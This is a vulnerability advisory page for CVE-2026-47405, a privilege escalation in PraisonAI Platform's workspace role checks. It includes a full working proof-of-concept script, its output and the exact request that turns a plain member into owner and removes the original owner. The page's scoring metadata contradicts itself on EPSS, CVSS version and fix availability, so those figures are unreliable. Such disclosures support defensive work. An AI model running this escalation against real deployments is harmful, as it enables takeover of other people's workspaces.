CVE-2026-47405

HIGHPre-NVD 8.88.8
EchelonGraph scoreLOW confidence

This high-severity CVE scores 8.8 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit probability: 0.1%, top 80% of all CVEs by exploit prediction. GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m, epss
8.8
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: 0%CVSS: 8.8Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

PraisonAI Platform: Missing role checks let any workspace member become owner and control workspace membership

Summary

PraisonAI Platform has a broken workspace authorization check that allows any authenticated low-privilege workspace member to escalate their own role to owner.

The issue is caused by privileged workspace-management routes using the shared dependency require_workspace_member(...) without requiring admin or owner. The dependency defaults to min_role="member", so routes that should be administrative are accessible to ordinary workspace members.

As a result, a normal workspace member can:

  • promote their own account from member to owner;
  • add arbitrary users as owner or admin;
  • change other members' roles;
  • remove legitimate owners or members;
  • take over workspace membership completely;
  • perform destructive workspace operations after escalation.

This is a broken access control / vertical privilege escalation vulnerability.

Details

The vulnerable authorization dependency is defined in:

praisonai_platform/api/deps.py

The dependency defaults to the lowest workspace role:

async def require_workspace_member(
    workspace_id: str,
    user: AuthIdentity = Depends(get_current_user),
    session: AsyncSession = Depends(get_db),
    min_role: str = "member",
) -> AuthIdentity:
    ...
    has = await member_svc.has_role(workspace_id, user.id, min_role)

Because min_role defaults to "member", any route using:

Depends(require_workspace_member)

without explicitly passing a stronger role only requires ordinary workspace membership.

Privileged workspace-management routes in:

praisonai_platform/api/routes/workspaces.py

use this dependency unchanged on administrative actions, including:

PATCH  /workspaces/{workspace_id}
DELETE /workspaces/{workspace_id}
POST   /workspaces/{workspace_id}/members
PATCH  /workspaces/{workspace_id}/members/{user_id}
DELETE /workspaces/{workspace_id}/members/{user_id}

These routes allow workspace modification, deletion, member addition, role changes, and member removal. They should require admin or owner, but they currently require only member.

The membership service does not provide a second authorization layer. In:

praisonai_platform/services/member_service.py

the mutation methods perform the requested change after the route-level check passes:

async def add(...):
    member = Member(workspace_id=workspace_id, user_id=user_id, role=role)

async def update_role(...): member = await self.get(workspace_id, user_id) member.role = new_role

async def remove(...): member = await self.get(workspace_id, user_id) await self._session.delete(member)

Therefore, the weak route dependency is the effective authorization boundary.

A low-privilege user can also learn their own user.id from the normal authentication response. The login/register response includes the authenticated user object:

TokenResponse.token
TokenResponse.user.id

This allows an invited low-privilege member to target their own membership record and self-promote.

Affected component

Package: praisonai-platform
Verified version: 0.1.2
Verified source commit: d8a8a78
Affected components:
  • praisonai_platform/api/deps.py
  • praisonai_platform/api/routes/workspaces.py
  • praisonai_platform/services/member_service.py
  • praisonai_platform/api/routes/auth.py
  • praisonai_platform/api/schemas.py

PoC

The following PoC is self-contained and exercises the real PraisonAI Platform FastAPI application path. It does not mock the vulnerable RBAC logic.

The PoC:

  • Creates the real FastAPI app with praisonai_platform.api.app.create_app().
  • Registers three users through the real /api/v1/auth/register route.
  • Creates a workspace as the original owner.
  • Adds the second user as a normal member.
  • Logs in as that low-privilege member.
  • Uses the low-privilege member token to self-promote to owner.
  • Uses the same token to add a third account as owner.
  • Uses the same token to remove the original owner.
  • Confirms the workspace membership has been taken over.

Full PoC code

#!/usr/bin/env python3
"""Self-contained local replay for PraisonAI Platform workspace RBAC bypass."""

from __future__ import annotations

import asyncio import os import sys import types import uuid from pathlib import Path

from httpx import ASGITransport, AsyncClient from sqlalchemy.ext.asyncio import create_async_engine

REPO_ROOT = Path(__file__).resolve().parents[3] / "repos" / "praisonai" PLATFORM_ROOT = REPO_ROOT / "src" / "praisonai-platform" AGENTS_ROOT = REPO_ROOT / "src" / "praisonai-agents"

def verify_source() -> None: expected = { PLATFORM_ROOT / "praisonai_platform/api/deps.py": [ 'min_role: str = "member"', "member_svc.has_role(workspace_id, user.id, min_role)", ], PLATFORM_ROOT / "praisonai_platform/api/routes/workspaces.py": [ '@router.patch("/{workspace_id}", response_model=WorkspaceResponse)', '@router.delete("/{workspace_id}", status_code=status.HTTP_204_NO_CONTENT)', '@router.post("/{workspace_id}/members", response_model=MemberResponse, status_code=status.HTTP_201_CREATED)', '@router.patch("/{workspace_id}/members/{user_id}", response_model=MemberResponse)', ], PLATFORM_ROOT / "praisonai_platform/services/member_service.py": [ "member.role = new_role", "await self._session.delete(member)", ], }

for path, needles in expected.items(): text = path.read_text(encoding="utf-8") for needle in needles: if needle not in text: raise RuntimeError(f"source verification failed: {needle!r} not found in {path}")

async def main() -> int: if not PLATFORM_ROOT.exists() or not AGENTS_ROOT.exists(): raise SystemExit("missing local PraisonAI source tree")

verify_source()

sys.path.insert(0, str(PLATFORM_ROOT)) sys.path.insert(0, str(AGENTS_ROOT))

# Minimal passlib stub for local replay environments where passlib is not installed. # This keeps the PoC focused on the authorization bug rather than dependency setup. if "passlib" not in sys.modules: passlib_pkg = types.ModuleType("passlib") passlib_pkg.__path__ = [] sys.modules["passlib"] = passlib_pkg

if "passlib.context" not in sys.modules: passlib_context = types.ModuleType("passlib.context")

class _CryptContext: def __init__(self, *args, **kwargs): pass

def hash(self, password: str) -> str: return f"stub::{password}"

def verify(self, password: str, hashed: str) -> bool: return hashed == f"stub::{password}"

passlib_context.CryptContext = _CryptContext sys.modules["passlib.context"] = passlib_context

# Keep JWT generation deterministic for the local replay. os.environ["PLATFORM_JWT_SECRET"] = "test-secret-for-testing-only"

from praisonai_platform.api.app import create_app from praisonai_platform.db.base import Base, reset_engine from praisonai_platform.db import base as base_mod

await reset_engine()

engine = create_async_engine( "sqlite+aiosqlite:///:memory:", echo=False, connect_args={"check_same_thread": False}, )

base_mod._engine = engine base_mod._session_factory = None

async with engine.begin() as conn: await conn.run_sync(Base.metadata.create_all)

app = create_app() suffix = uuid.uuid4().hex[:8] password = "Password123!"

transport = ASGITransport(app=app)

async with AsyncClient(transport=transport, base_url="http://test") as client: # 1. Register an owner account. owner = await client.post( "/api/v1/auth/register", json={ "email": f"owner_{suffix}@example.com", "password": password, "name": f"owner_{suffix}", }, )

# 2. Register a low-privilege member account. member = await client.post( "/api/v1/auth/register", json={ "email": f"member_{suffix}@example.com", "password": password, "name": f"member_{suffix}", }, )

# 3. Register a third attacker-controlled account. extra = await client.post( "/api/v1/auth/register", json={ "email": f"extra_{suffix}@example.com", "password": password, "name": f"extra_{suffix}", }, )

owner_json = owner.json() member_json = member.json() extra_json = extra.json()

owner_headers = {"Authorization": f"Bearer {owner_json['token']}"} member_headers = {"Authorization": f"Bearer {member_json['token']}"}

# 4. Create a workspace as the owner. workspace = await client.post( "/api/v1/workspaces/", json={ "name": f"ws-{suffix}", "slug": f"ws-{suffix}", "description": "rbac bypass poc", }, headers=owner_headers, )

workspace_id = workspace.json()["id"]

# 5. Owner adds the second user as a normal low-privilege member. added_member = await client.post( f"/api/v1/workspaces/{workspace_id}/members", json={ "user_id": member_json["user"]["id"], "role": "member", }, headers=owner_headers, )

# 6. Low-privilege member self-promotes to owner. promoted = await client.patch( f"/api/v1/workspaces/{workspace_id}/members/{member_json['user']['id']}", json={ "role": "owner", }, headers=member_headers, )

# 7. The same formerly-low-privilege member adds a third account as owner. added_owner = await client.post( f"/api/v1/workspaces/{workspace_id}/members", json={ "user_id": extra_json["user"]["id"], "role": "owner", }, headers=member_headers, )

# 8. The same account removes the original owner. removed_original_owner = await client.delete( f"/api/v1/workspaces/{workspace_id}/members/{owner_json['user']['id']}", headers=member_headers, )

# 9. Confirm remaining membership state. remaining_members = await client.get( f"/api/v1/workspaces/{workspace_id}/members", headers=member_headers, )

remaining_roles = [m["role"] for m in remaining_members.json()]

print(f"[poc] owner_status={owner.status_code}") print(f"[poc] member_status={member.status_code}") print(f"[poc] extra_status={extra.status_code}") print(f"[poc] workspace_status={workspace.status_code}") print(f"[poc] add_status={added_member.status_code} role={added_member.json()['role']}") print(f"[poc] promote_status={promoted.status_code} role={promoted.json()['role']}") print(f"[poc] add_owner_status={added_owner.status_code} role={added_owner.json()['role']}") print(f"[poc] remove_original_owner_status={removed_original_owner.status_code}") print(f"[poc] remaining_roles={remaining_roles}")

if promoted.status_code != 200 or promoted.json()["role"] != "owner": raise SystemExit("[poc] MISS: low-privilege member did not become owner")

if added_owner.status_code != 201 or added_owner.json()["role"] != "owner": raise SystemExit("[poc] MISS: promoted attacker could not add a new owner")

if removed_original_owner.status_code != 204: raise SystemExit("[poc] MISS: promoted attacker could not remove the original owner")

if remaining_roles.count("owner") < 2: raise SystemExit("[poc] MISS: expected attacker-controlled owners after takeover")

print("[poc] HIT: low-privilege member became owner and took over workspace membership")

await engine.dispose() base_mod._engine = None base_mod._session_factory = None

return 0

if __name__ == "__main__": raise SystemExit(asyncio.run(main()))

Observed output

[poc] owner_status=201
[poc] member_status=201
[poc] extra_status=201
[poc] workspace_status=201
[poc] add_status=201 role=member
[poc] promote_status=200 role=owner
[poc] add_owner_status=201 role=owner
[poc] remove_original_owner_status=204
[poc] remaining_roles=['owner', 'owner']
[poc] HIT: low-privilege member became owner and took over workspace membership

Expected secure behavior

The following request should be rejected when made by a plain member:

PATCH /api/v1/workspaces/{workspace_id}/members/{member_user_id}
Authorization: Bearer 
Content-Type: application/json

{ "role": "owner" }

Expected response:

403 Forbidden

Actual vulnerable behavior

The request succeeds:

HTTP 200
role = owner

The same account can then add attacker-controlled owners and remove the original owner.

Impact

A low-privilege workspace member can fully take over a workspace.

Impact includes:

* self-promoting from member to owner or admin; * granting owner or admin` to attacker-controlled accounts; * changing other members' roles; * removing legitimate owners or members; * modifying workspace metadata and settings; * deleting the workspace; * taking over workspace-scoped issues, projects, labels, agents, and other resources after role escalation.

The attacker only needs an authenticated low-privilege membership in the target workspace. No race condition, special deployment, or administrator action is required.

CVSS v3
8.8
EG Score
8.8(low)
EPSS
20.1%
KEV
Not listed

Published

May 29, 2026

Last Modified

May 29, 2026

Vendor Advisories for CVE-2026-47405(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(1 across 1 ecosystem)
PyPI(1)
PackageVulnerable rangeFixed inDependents
praisonai-platform0.1.0, 0.1.1, 0.1.2, 0.1.30.1.4

Data Freshness Timeline

(refreshed 3× in last 7d / 25× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-16 01:45 UTCEG score recompute
  2. 2026-07-14 13:44 UTCEG score recompute
  3. 2026-07-11 16:53 UTCEG score recompute
  4. 2026-07-08 17:15 UTCEG score recompute
  5. 2026-07-02 15:58 UTCEG score recompute
  6. 2026-07-02 03:41 UTCEG score recompute
  7. 2026-07-01 13:07 UTCEG score recompute
  8. 2026-07-01 01:17 UTCEG score recompute
  9. 2026-06-30 00:48 UTCEG score recompute
  10. 2026-06-29 12:26 UTCEG score recompute
  11. 2026-06-28 15:57 UTCEG score recompute
  12. 2026-06-28 04:05 UTCEG score recompute
  13. 2026-06-27 16:12 UTCEG score recompute
  14. 2026-06-27 04:11 UTCEG score recompute
  15. 2026-06-26 16:10 UTCEG score recompute
  16. 2026-06-26 02:43 UTCEG score recompute
  17. 2026-06-25 14:52 UTCEG score recompute
  18. 2026-06-25 03:00 UTCEG score recompute
  19. 2026-06-24 15:10 UTCEG score recompute
  20. 2026-06-24 02:40 UTCEG score recompute
  21. 2026-06-18 22:20 UTCEG score recompute
  22. 2026-06-18 10:15 UTCEG score recompute
  23. 2026-06-17 19:50 UTCEG score recompute
  24. 2026-06-17 07:59 UTCEG score recompute
  25. 2026-06-16 20:08 UTCEG score recompute
Show 36 more
  1. 2026-06-16 08:19 UTCEG score recompute
  2. 2026-06-15 20:27 UTCEG score recompute
  3. 2026-06-15 08:13 UTCEG score recompute
  4. 2026-06-14 23:18 UTCEPSS rescore
  5. 2026-06-14 20:22 UTCEG score recompute
  6. 2026-06-14 08:32 UTCEG score recompute
  7. 2026-06-13 23:00 UTCEPSS rescore
  8. 2026-06-13 20:42 UTCEG score recompute
  9. 2026-06-13 08:52 UTCEG score recompute
  10. 2026-06-12 23:12 UTCEPSS rescore
  11. 2026-06-12 21:02 UTCEG score recompute
  12. 2026-06-12 09:11 UTCEG score recompute
  13. 2026-06-11 21:22 UTCEG score recompute
  14. 2026-06-11 09:32 UTCEG score recompute
  15. 2026-06-10 21:42 UTCEG score recompute
  16. 2026-06-10 09:53 UTCEG score recompute
  17. 2026-06-09 22:03 UTCEG score recompute
  18. 2026-06-09 10:13 UTCEG score recompute
  19. 2026-06-08 22:24 UTCEG score recompute
  20. 2026-06-08 10:34 UTCEG score recompute
  21. 2026-06-07 22:45 UTCEG score recompute
  22. 2026-06-07 10:55 UTCEG score recompute
  23. 2026-06-06 23:05 UTCEG score recompute
  24. 2026-06-06 11:15 UTCEG score recompute
  25. 2026-06-05 23:25 UTCEG score recompute
  26. 2026-06-05 11:36 UTCEG score recompute
  27. 2026-06-04 23:46 UTCEG score recompute
  28. 2026-06-04 11:30 UTCEG score recompute
  29. 2026-06-03 23:40 UTCEG score recompute
  30. 2026-06-03 11:50 UTCEG score recompute
  31. 2026-06-03 00:00 UTCEG score recompute
  32. 2026-06-02 12:10 UTCEG score recompute
  33. 2026-06-02 00:20 UTCEG score recompute
  34. 2026-06-01 12:30 UTCEG score recompute
  35. 2026-06-01 00:40 UTCEG score recompute
  36. 2026-05-29 23:13 UTCEG score recompute

Frequently asked(5)

What is CVE-2026-47405?
CVE-2026-47405 is a high vulnerability published on May 29, 2026. PraisonAI Platform: Missing role checks let any workspace member become owner and control workspace membership Summary PraisonAI Platform has a broken workspace authorization check that allows any authenticated low-privilege workspace member to escalate their own role to owner. The issue is caused…
When was CVE-2026-47405 disclosed?
CVE-2026-47405 was first published in the National Vulnerability Database on May 29, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
Is CVE-2026-47405 actively exploited?
CVE-2026-47405 is not currently on CISA's Known Exploited Vulnerabilities catalog. FIRST EPSS estimates a 20.1% percentile likelihood of exploitation in the next 30 days — higher percentiles indicate greater predicted risk.
What is the CVSS score of CVE-2026-47405?
CVE-2026-47405 has a CVSS v4.0 base score of 8.8 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-47405?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-47405, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-47405

Explore →

Is Your Infrastructure Affected by CVE-2026-47405?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.